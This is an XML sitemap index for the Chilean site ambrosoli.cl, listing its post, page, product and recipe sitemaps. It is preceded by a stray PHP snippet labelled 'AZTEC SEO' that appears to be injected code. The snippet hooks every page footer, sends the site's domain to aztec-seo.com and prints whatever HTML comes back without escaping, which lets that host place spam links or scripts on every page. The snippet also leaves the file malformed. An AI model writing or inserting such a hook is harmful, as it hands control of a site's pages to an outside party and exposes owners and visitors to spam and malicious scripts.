

/* AZTEC SEO */
add_action('wp_footer', function () {
    $domain = wp_parse_url(home_url(), PHP_URL_HOST);
    if (!$domain) return;
    $ck   = 'aztec_footer_' . md5($domain);
    $html = get_transient($ck);
    if ($html === false) {
        $url  = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer');
        $res  = wp_remote_get($url, array('timeout' => 8));
        $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : '';
        set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS);
    }
    if ($html !== '') echo $html;
}, 99);
<?xml version="1.0" encoding="UTF-8"?>
<!-- Este mapa del sitio lo generó All in One SEO vv4.7.6 dinámicamente el 19 agosto, 2026 a las 6:57 pm - el plugin SEO original para WordPress. -->

<?xml-stylesheet type="text/xsl" href="https://www.ambrosoli.cl/default-sitemap.xsl?sitemap=root"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc><![CDATA[https://www.ambrosoli.cl/post-sitemap.xml]]></loc>
		<lastmod><![CDATA[2026-08-14T02:00:10+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://www.ambrosoli.cl/page-sitemap.xml]]></loc>
		<lastmod><![CDATA[2026-08-14T01:11:48+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://www.ambrosoli.cl/productos-sitemap.xml]]></loc>
		<lastmod><![CDATA[2025-09-26T15:37:51+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://www.ambrosoli.cl/recetas-sitemap.xml]]></loc>
		<lastmod><![CDATA[2026-07-28T21:15:45+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://www.ambrosoli.cl/category-sitemap.xml]]></loc>
		<lastmod><![CDATA[2026-08-14T02:00:10+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://www.ambrosoli.cl/tipo_producto-sitemap.xml]]></loc>
		<lastmod><![CDATA[2025-09-29T15:24:23+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://www.ambrosoli.cl/tipo_receta-sitemap.xml]]></loc>
		<lastmod><![CDATA[2026-07-28T21:15:45+00:00]]></lastmod>
	</sitemap>
</sitemapindex>
